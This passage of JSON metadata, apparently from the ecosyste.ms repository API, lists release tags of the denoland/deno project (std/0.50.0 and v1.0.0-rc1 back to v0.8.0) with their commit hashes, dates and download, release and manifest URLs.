l":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019